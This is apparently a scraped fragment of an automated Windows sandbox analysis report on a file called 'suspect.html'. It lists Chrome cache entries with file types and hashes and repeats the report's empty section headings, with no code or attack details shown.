Chrome Cache Entry: 83	HTML document, ASCII text, with no line terminators	5953CFF560D82FDF8CF2A6D298CDC3D8	B5C6429A7619387A1D8B433AB3B32B3CB38D8C6A	0CED1BBB58A355B427D11E7F3DB1927415E4B6232584612535BCEED551607CFB
Chrome Cache Entry: 84	RIFF (little-endian) data, Web/P image	F9A795E2270664A7A169C73B6D84A575	0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8	D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
Chrome Cache Entry: 87	ASCII text, with very long lines (65447)	8FB8FEE4FCC3CC86FF6C724154C49C42	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
Chrome Cache Entry: 88	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	FC3B7BBE7970F47579127561139060E2	3F7C5783FE1F4404CB16304A5A274778EA3ABD25	85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
Chrome Cache Entry: 90	ASCII text, with very long lines (10450)	E0D37A504604EF874BAD26435D62011F	4301F0D2B729AE22ADECE657D79ECCAA25F429B1	C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
Chrome Cache Entry: 91	ASCII text, with very long lines (26765), with no line terminators	1A862A89D5633FAC83D763886726740D	E5CE3AA454C992A13FD406A9647D7AFBF831051F	5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
Chrome Cache Entry: 93	RIFF (little-endian) data, Web/P image	4946EB373B18D178C93D473489673BB6	16477ACB73B63CA251D37401249E7E4515FEBD24	666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
Chrome Cache Entry: 99	ASCII text, with very long lines (10017)	6C20A2BE8BA900BC0A7118893A2B1072	FF7766FDE1F33882C6E1C481CEED6F6588EA764C	B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500

Windows Analysis Report
suspect.html

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report suspect.html

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
suspect.html